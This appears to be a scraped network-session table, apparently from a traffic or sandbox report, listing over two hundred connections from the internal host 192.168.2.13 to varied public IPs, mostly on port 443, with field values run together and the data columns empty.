                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19201192.168.2.133678819.234.205.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19202192.168.2.1352134132.239.79.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19203192.168.2.13490301.7.145.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19204192.168.2.1355660204.200.45.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19205192.168.2.1341402178.240.65.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19206192.168.2.1348982109.49.134.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19207192.168.2.133537046.142.156.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19208192.168.2.1354984122.61.141.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19209192.168.2.1339700216.26.18.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19210192.168.2.1360250159.109.151.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19211192.168.2.133587859.165.81.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19212192.168.2.1346974128.8.16.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19213192.168.2.13520064.210.101.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19214192.168.2.134667675.181.217.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19215192.168.2.1342466102.151.60.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19216192.168.2.135683251.233.150.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19217192.168.2.1335700188.180.13.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19218192.168.2.13361844.160.197.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19219192.168.2.1347678107.62.248.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19220192.168.2.1335066153.47.148.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19221192.168.2.1355712169.236.148.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19222192.168.2.1343124183.115.26.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19223192.168.2.1335032196.171.218.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19224192.168.2.1338550143.49.60.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19225192.168.2.1350574137.76.68.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19226192.168.2.133417251.225.89.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19227192.168.2.134015277.47.134.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19228192.168.2.133974485.165.243.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19229192.168.2.1347764191.8.137.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19230192.168.2.1336774165.255.200.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19231192.168.2.1352726147.1.44.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19232192.168.2.136020219.141.127.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19233192.168.2.134144059.215.219.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19234192.168.2.135684088.76.255.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19235192.168.2.134431044.209.181.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19236192.168.2.1359554154.188.22.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19237192.168.2.134485076.89.207.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19238192.168.2.1333584160.65.160.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19239192.168.2.1341530160.143.88.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19240192.168.2.1340516212.111.164.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19241192.168.2.134498250.230.225.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19242192.168.2.13592268.223.23.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19243192.168.2.1338950170.138.66.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19244192.168.2.135005693.81.6.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19245192.168.2.134720812.134.29.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19246192.168.2.1336038130.201.27.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19247192.168.2.135804297.211.230.137443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19248192.168.2.1353344117.94.94.232443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19249192.168.2.1346430187.117.0.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19250192.168.2.135204854.36.40.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19251192.168.2.1340398148.140.51.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19252192.168.2.1333614144.116.79.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19253192.168.2.1338534175.58.5.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19254192.168.2.13546169.193.46.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19255192.168.2.1359826175.219.3.174443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19256192.168.2.134866490.214.153.12443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19257192.168.2.1341756164.78.26.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19258192.168.2.1358666148.52.5.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19259192.168.2.1337826109.197.183.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19260192.168.2.1335178130.116.245.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19261192.168.2.1354112199.8.51.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19262192.168.2.1354198114.68.205.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19263192.168.2.13551061.22.176.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19264192.168.2.1335028146.203.191.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19265192.168.2.133914439.244.68.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19266192.168.2.1350812129.160.142.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19267192.168.2.1354072223.206.130.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19268192.168.2.133616283.117.219.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19269192.168.2.1348490106.37.20.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19270192.168.2.1358618165.96.124.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19271192.168.2.1355390208.216.33.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19272192.168.2.1340750154.188.232.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19273192.168.2.136004692.224.48.189443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19274192.168.2.1359466195.162.141.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19275192.168.2.135778837.178.232.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19276192.168.2.1339928104.91.4.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19277192.168.2.133785471.117.193.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19278192.168.2.1342878204.139.218.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19279192.168.2.1333350153.170.61.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19280192.168.2.135650639.244.66.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19281192.168.2.133991014.126.180.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19282192.168.2.1352782180.117.189.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19283192.168.2.1360988218.168.147.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19284192.168.2.134226651.198.173.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19285192.168.2.1336796182.220.102.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19286192.168.2.135352220.148.188.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19287192.168.2.1349362198.142.84.181443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19288192.168.2.135060812.17.243.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19289192.168.2.1346200175.231.236.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19290192.168.2.134844227.83.40.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19291192.168.2.1345720106.73.148.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19292192.168.2.1352118167.185.253.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19293192.168.2.133992249.1.203.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19294192.168.2.1360946160.172.57.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19295192.168.2.1340844210.183.224.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19296192.168.2.134537661.122.255.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19297192.168.2.1346036198.70.40.151443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19298192.168.2.1352616147.254.68.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19299192.168.2.133875818.100.73.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19300192.168.2.133916613.178.54.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19301192.168.2.134953619.185.127.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19302192.168.2.13499304.50.132.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19303192.168.2.1346916217.66.34.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19304192.168.2.135504684.126.50.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19305192.168.2.1359180184.114.27.255443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19306192.168.2.1338112174.137.213.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19307192.168.2.1343658101.229.208.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19308192.168.2.1347254104.33.183.136443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19309192.168.2.133535012.99.31.195443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19310192.168.2.1338586167.205.159.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19311192.168.2.135219645.26.138.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19312192.168.2.1340700101.88.25.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19313192.168.2.1336092123.96.16.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19314192.168.2.1340190182.70.30.191443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19315192.168.2.1349970131.54.254.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19316192.168.2.135050491.32.255.46443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19317192.168.2.135817649.75.13.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19318192.168.2.1350922102.215.109.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19319192.168.2.1343202113.136.135.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19320192.168.2.133994425.57.1.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19321192.168.2.1337694102.128.88.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19322192.168.2.1360608106.182.69.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19323192.168.2.135277018.202.109.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19324192.168.2.133957866.125.197.160443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19325192.168.2.1338278106.141.249.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19326192.168.2.133319860.179.184.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19327192.168.2.1356644193.215.112.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19328192.168.2.133419675.177.192.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19329192.168.2.1358276130.216.38.248443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19330192.168.2.1350944130.29.254.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19331192.168.2.1334576110.195.227.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19332192.168.2.1355420208.56.43.71443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19333192.168.2.1340138178.207.248.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19334192.168.2.1353572211.91.35.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19335192.168.2.133561674.165.140.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19336192.168.2.134821260.202.160.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19337192.168.2.1341798111.110.96.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19338192.168.2.1333236143.174.111.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19339192.168.2.1334822149.164.71.162443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19340192.168.2.1334384162.239.58.168443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19341192.168.2.1343978174.190.178.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19342192.168.2.1349654128.234.147.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19343192.168.2.135583083.224.14.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19344192.168.2.1349798194.160.29.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19345192.168.2.1353682223.42.26.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19346192.168.2.1357560206.166.86.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19347192.168.2.1347926172.15.173.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19348192.168.2.135454451.200.193.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19349192.168.2.135907019.90.143.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19350192.168.2.1359006212.183.180.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19351192.168.2.1337326212.217.21.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19352192.168.2.1344160146.25.221.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19353192.168.2.1338642130.129.202.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19354192.168.2.1337160199.200.237.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19355192.168.2.1358482155.185.170.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19356192.168.2.1346386218.76.203.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19357192.168.2.134706025.123.112.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19358192.168.2.134210454.232.231.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19359192.168.2.134005640.21.134.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19360192.168.2.1356584186.36.73.67443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19361192.168.2.135780485.75.139.2368080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19362192.168.2.1349046149.221.138.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19363192.168.2.1339730207.220.241.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19364192.168.2.1337994107.177.89.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19365192.168.2.1359992135.199.163.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19366192.168.2.1360618209.28.163.110443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19367192.168.2.13586324.25.202.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19368192.168.2.134966299.23.35.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19369192.168.2.1346612145.94.120.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19370192.168.2.1359070133.70.239.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19371192.168.2.134970260.129.53.0443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19372192.168.2.1350776101.238.16.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19373192.168.2.1336486156.154.98.223443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19374192.168.2.133606446.234.193.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19375192.168.2.1337710213.200.49.190443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19376192.168.2.1351798199.102.148.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19377192.168.2.1360108142.83.19.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19378192.168.2.134547673.219.186.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19379192.168.2.134980299.115.170.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19380192.168.2.135560874.97.49.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19381192.168.2.1352034153.197.13.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19382192.168.2.1333236166.30.84.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19383192.168.2.135886084.0.223.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19384192.168.2.134874860.248.9.117443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19385192.168.2.133980018.87.145.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19386192.168.2.133909682.48.215.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19387192.168.2.1333768221.102.37.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19388192.168.2.1345904162.62.136.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19389192.168.2.1338126122.235.134.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19390192.168.2.1352504187.117.202.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19391192.168.2.1341482104.147.62.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19392192.168.2.135824096.37.223.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19393192.168.2.1337572201.159.39.196443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19394192.168.2.134407262.217.54.64443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19395192.168.2.134247283.212.171.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19396192.168.2.1334988159.93.209.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19397192.168.2.135513492.239.211.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19398192.168.2.1337032216.232.167.88443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19399192.168.2.1360732117.251.171.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19400192.168.2.1337022101.19.86.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19401192.168.2.134368297.31.183.211443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19402192.168.2.133384439.44.143.56443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19403192.168.2.1349118132.157.123.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19404192.168.2.135228246.73.83.215443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19405192.168.2.134375671.99.96.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19406192.168.2.135238259.121.72.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19407192.168.2.1358084202.78.209.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19408192.168.2.1346232120.206.124.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19409192.168.2.1334050211.95.63.72443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19410192.168.2.1349274100.182.140.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19411192.168.2.1342084130.81.157.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  19412192.168.2.134549479.125.19.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
